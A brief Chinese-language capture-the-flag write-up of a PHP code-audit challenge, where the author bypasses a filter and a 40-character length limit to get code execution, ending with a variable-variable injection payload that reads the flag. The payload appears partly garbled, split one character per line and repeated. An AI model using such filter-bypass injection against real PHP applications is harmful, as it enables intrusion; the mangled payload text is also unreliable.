打开环境,查看页面源代码
代码审计payloud题型,挺变态的-----但是发现了任意代码执行漏洞
看源码发现不仅有过滤还有长度限制
F12发现click here的提示,点击链接会用GET方法传入一串字符串$ exam,后面是当前间的一串sha1哈希值
要求就是$ flag长度要和$exam一样
数下来是40
接下来构造就完事了
构造payload=/?flag=
x
x
x
x
x
x
x
=
′
∗
l
a
g
′
;
xxxxxxx='*lag';
xxxxxxx=′∗lag′;xxxxxxx{0}=‘f’;?><?=$$xxxxxxx;?>